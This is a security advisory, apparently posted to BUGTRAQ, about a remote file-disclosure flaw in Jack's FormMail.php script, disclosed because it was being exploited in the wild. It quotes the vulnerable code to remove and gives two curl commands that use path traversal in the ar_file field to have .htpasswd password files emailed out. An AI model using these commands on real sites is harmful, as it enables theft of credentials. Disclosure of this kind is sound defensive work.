Security Advisory

Vendor:       Jack (Jack's Scripts)
Date:         31-Dec-2004
Script:       FormMail.php
Site:         http://dtheatre.com/scripts/formmail.php
Type:         Remote
Severity:     High
Version:      5.0 (maybe others)

Script Overview:

Jacks FormMail.php script is a simple PHP script that
allows web site owners to easily email form values to
themselves without much work or scripting knowledge.

Problem:

The script currently accepts an auto-reply variable
(ar_file) that specifies a filepath to send to the
person submitting the form.  The problem is that
this variable can be defined by the person submitting
the form and can be used to have arbitrary server
files sent to that person.

I found this vulnerability because someone used the
attack against a customer of mine.  Because this is
being used in the wild, I'm posting immediately to
BUGTRAQ without waiting for Jack to fix the script.

Solution:

Remove the following code from the FormMail.php
script.
------------------------------------------------------
if (file_exists($ar_file)) {
   $fd = fopen($ar_file, "rb");
   $ar_message = fread($fd, filesize($ar_file));
   fclose($fd);
   mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE:
Form Submission", ($ar_from)?$ar_from:$recipient, $email);
}
------------------------------------------------------

Example Attack:

Assume the following
Script Location : http://yoursite.com/cgi-bin/formmail.php
Password File Location : http://yoursite.com/members/.htpasswd

Use the following curl command to have the password file emailed to you.

# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d
email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php

Depending on permission settings, the .htpasswd could be
compromised, even if it is outside of the html folder as
in the following example.

# curl -e http://yoursite.com/ -d ar_file=../../.htpasswd -d
email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php